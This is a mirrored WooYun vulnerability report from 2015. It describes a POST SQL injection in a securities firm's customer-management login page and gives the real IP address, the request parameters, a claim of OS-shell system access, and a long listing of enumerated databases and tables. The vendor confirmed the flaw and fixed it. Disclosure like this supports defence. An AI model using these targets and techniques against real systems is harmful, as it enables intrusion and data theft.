乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-21: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开
可导致11个数据库以及大量信息泄漏
国海证券客户管理http://58.60.191.91:88/index.asppost注入http://58.60.191.91:88/index.asp (POST)userid=admin&password=123456&Submit=%B5%C7%C2%BC
可执行os-shell 系统权限
看下大量表信息
Database: tempdb[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: zxnews[41 tables]+--------------------------------------------+| Category || Discuss2 || Discuss2 || News || Users || cpfw || dhjl || dtproperties || ggnews || gpc || gzdg || jgkhb || jgxsb_kh || jjfw || jljl || jrgc || jx || jxxxx || khtxl || mtfb || ptjl || spzx || sysconstraints || syssegments || xzbm || xzgz || yjbg || yjshd || yjsjlsjk || yjy_js_pgb2 || yjy_js_pgb_2 || yjy_js_pgb_2 || yjy_kh_2014_07_2 || yjy_kh_2014_07_2 || yjy_kh_999 || yjy_tjb_ch || yjy_tjb_ch || yjy_tjb_cpfw || yjy_tjb_dy || yjy_tjb_mt || yjy_tjb_yjbg |+--------------------------------------------+Database: msdb[83 tables]+--------------------------------------------+| RTblClassDefs || RTblClassExtension || RTblDBMProps || RTblDBXProps || RTblDTMProps || RTblDTSProps || RTblDatabaseVersion || RTblEQMProps || RTblEnumerationDef || RTblEnumerationValueDef || RTblGENProps || RTblIfaceDefs || RTblIfaceHier || RTblIfaceMem || RTblMDSProps || RTblNamedObj || RTblOLPProps || RTblParameterDef || RTblPropDefs || RTblProps || RTblRelColDefs || RTblRelshipDefs || RTblRelshipProps || RTblRelships || RTblSIMProps || RTblScriptDefs || RTblSites || RTblSumInfo || RTblTFMProps || RTblTypeInfo || RTblTypeLibs || RTblUMLProps || RTblUMXProps || RTblVersionAdminInfo || RTblVersions || RTblWorkspaceItems || backupfile || backupmediafamily || backupmediaset || backupset || log_shipping_databases || log_shipping_monitor || log_shipping_plan_databases || log_shipping_plan_history || log_shipping_plans || log_shipping_primaries || log_shipping_secondaries || logmarkhistory || mswebtasks || restorefilegroup || restorefilegroup || restorehistory || sqlagent_info || sysalerts || syscachedcredentials || syscategories || sysconstraints || sysdbmaintplan_databases || sysdbmaintplan_history || sysdbmaintplan_jobs || sysdbmaintplans || sysdownloadlist || sysdtscategories || sysdtspackagelog || sysdtspackages || sysdtssteplog || sysdtstasklog || sysjobhistory || sysjobs_view || sysjobs_view || sysjobschedules || sysjobservers || sysjobsteps || sysnotifications || sysoperators || syssegments || systargetservergroupmembers || systargetservergroups || systargetservers_view || systargetservers_view || systaskids || systasks_view || systasks_view |+--------------------------------------------+Database: pubs[14 tables]+--------------------------------------------+| authors || discounts || employee || jobs || pub_info || publishers || roysched || sales || stores || sysconstraints || syssegments || titleauthor || titles || titleview |+--------------------------------------------+Database: kq[45 tables]+--------------------------------------------+| ACGroup || ACTimeZones || ACUnlockComb || AUTHDEVICE || AlarmLog || AttParam || AuditedExc || CHECKEXACT || CHECKINOUT || DEPARTMENTS || DeptUsedSchs || EXCNOTES || EmOpLog || FaceTemp || HOLIDAYS || LeaveClass1 || LeaveClass1 || Machines || NUM_RUN_DEIL || NUM_RUN_DEIL || ReportItem || SECURITYDETAILS || SHIFT || SchClass || ServerLog || SystemLog || TBKEY || TBSMSALLOT || TBSMSINFO || TEMPLATE || USERINFO || USER_OF_RUN || USER_SPEDAY || USER_TEMP_SCH || UserACMachines || UserACPrivilege || UserUpdates || UserUsedSClasses || UsersMachines || dtproperties || jx_kq_9 || jx_kq_9 || loucheng || sysconstraints || syssegments |+--------------------------------------------+Database: master[36 tables]+--------------------------------------------+| INFORMATION_SCHEMA.CHECK_CONSTRAINTS || INFORMATION_SCHEMA.COLUMNS || INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE || INFORMATION_SCHEMA.COLUMN_PRIVILEGES || INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE || INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE || INFORMATION_SCHEMA.DOMAINS || INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS || INFORMATION_SCHEMA.KEY_COLUMN_USAGE || INFORMATION_SCHEMA.PARAMETERS || INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS || INFORMATION_SCHEMA.ROUTINES || INFORMATION_SCHEMA.ROUTINE_COLUMNS || INFORMATION_SCHEMA.SCHEMATA || INFORMATION_SCHEMA.TABLES || INFORMATION_SCHEMA.TABLE_CONSTRAINTS || INFORMATION_SCHEMA.TABLE_PRIVILEGES || INFORMATION_SCHEMA.VIEWS || INFORMATION_SCHEMA.VIEW_COLUMN_USAGE || INFORMATION_SCHEMA.VIEW_TABLE_USAGE || MSreplication_options || spt_datatype_info_ext || spt_datatype_info_ext || spt_fallback_db || spt_fallback_dev || spt_fallback_usg || spt_monitor || spt_provider_types || spt_server_info || spt_values || sysconstraints || syslogins || sysoledbusers || sysopentapes || sysremotelogins || syssegments |+--------------------------------------------+Database: jjtj_yyb[21 tables]+--------------------------------------------+| Departments_yyb9 || Departments_yyb9 || Departments_yyb9 || Departments_yybcx2 || Departments_yybcx9 || Departments_yybcx_3 || Departments_yybcx_3 || Dkhcategory3 || dtproperties || gzr || jhlc_cp_k || jjxs_dj_DE0002 || jjxs_dj_DE0002 || jjxs_dt || jxzxx1 || jxzxx1 || jxzxx3 || sysconstraints || syssegments || table1 || table2 |+--------------------------------------------+Database: news[93 tables]+--------------------------------------------+| Category || DepTrans || Departments || Discuss2 || Discuss2 || Dkhcategory3 || Dkhcategory_gzbg || Dkhcategory_gzbg || Dkhnews || Dkhusers_2 || Dkhusers_2 || Employees || Evaluation || News || Salary2 || Salary2 || SalaryItem2 || SalaryItem_phgx || SalaryItem_phgx || SalaryStatistics || SaleChance || SaleTask || TaxRate || Users || bm || dkhDiscuss3 || dkhDiscuss_khfx || dkhDiscuss_khfx || dkhDiscusshz || dkhDiscussjj3 || dkhcategort || dtproperties || ggNews || gpc2 || gpc_th10 || gpc_th10 || gpc_th10 || gpc_th11 || gpc_th2 || gpc_th3 || gpc_th4 || gpc_th5 || gpc_th6 || gpc_th7 || gpc_th8 || gpc_th9 || gzb_cx || gzb_ps || gzbgsjk2 || gzbgsjk_gs || gzbgsjk_gs || gzts || jjccsjk || jjdkh || jjsjk || jx_tmp1 || jx_tmp1 || jx_tmp1 || jx_tmp2 || jyyjcate || jyyjcate || lxcl || mbgl2 || mbgl2 || mbglDiscuss2 || mbglDiscuss2 || nzjj || nzjjsjk || rlzy_gzxm || rlzy_sbxm_phgx || rlzy_sbxm_phgx || saleDiscuss || sb_200803 || sbjs || sbsjk || sf || sysconstraints || syssegments || thccsjk || thccsqsjk20081231 || thccsqsjk20081231 || thdkh || thsjk || v_Sts2 || v_Sts_bf || v_Sts_bf || wcmxsjk || yjsjlsjk || ywxtgwlz || ywxtgwlz || zcbCategory || zcbNews || zcbly |+--------------------------------------------+Database: model[2 tables]+--------------------------------------------+| sysconstraints || syssegments |+--------------------------------------------+Database: Northwind[31 tables]+--------------------------------------------+| Categories || CustomerCustomerDemo || CustomerDemographics || Customers || EmployeeTerritories || Employees || Invoices || Region || Shippers || Suppliers || Territories || Alphabetical list of products || Category Sales for 1997 || Current Product List || Customer and Suppliers by City || Order Details Extended || Order Details Extended || Order Subtotals || Orders Qry || Orders Qry || Product Sales for 1997 || Products Above Average Price || Products Above Average Price || Products by Category || Quarterly Orders || Sales Totals by Amount || Sales by Category || Summary of Sales by Quarter || Summary of Sales by Year || sysconstraints || syssegments |+--------------------------------------------+Database: kaoqin[45 tables]+--------------------------------------------+| ACGroup || ACTimeZones || ACUnlockComb || AUTHDEVICE || AlarmLog || AttParam || AuditedExc || CHECKEXACT || CHECKINOUT || DEPARTMENTS || DeptUsedSchs || EXCNOTES || EmOpLog || FaceTemp || HOLIDAYS || LeaveClass1 || LeaveClass1 || Machines || NUM_RUN_DEIL || NUM_RUN_DEIL || ReportItem || SECURITYDETAILS || SHIFT || SchClass || ServerLog || SystemLog || TBKEY || TBSMSALLOT || TBSMSINFO || TEMPLATE || USERINFO || USER_OF_RUN || USER_SPEDAY || USER_TEMP_SCH || UserACMachines || UserACPrivilege || UserUpdates || UserUsedSClasses || UsersMachines || dtproperties || gzr2 || gzr2 || jx_kq || sysconstraints || syssegments |+--------------------------------------------+
内网多数机器可进一步渗透
过滤
危害等级:中
漏洞Rank:5
确认时间:2015-09-21 14:04
本系统属于老的业务系统,准备下线
2015-09-25:漏洞已修复完成
2015-10-09:漏洞已修复,谢谢!
